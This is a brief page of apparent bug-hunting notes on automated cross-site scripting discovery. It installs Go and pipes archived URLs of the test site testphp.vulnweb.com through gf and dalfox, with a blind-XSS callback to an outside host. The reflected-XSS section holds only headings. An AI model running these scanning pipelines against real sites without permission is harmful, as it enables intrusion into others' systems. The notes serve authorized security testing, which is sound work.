Automated XSS
Prerequisites: Installing Go on Your Machine
sudo apt install -y golang
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
source .bashrcHunting Blind XSS Using Dalfox
Execution Command:
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \
cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txtHunting Reflected XSS
Execution Command:
Identifying Parameters That Do Not Filter Special Characters
Downloading the Required Tools
Tool
GitHub Repository
Contact Information
Last updated
Was this helpful?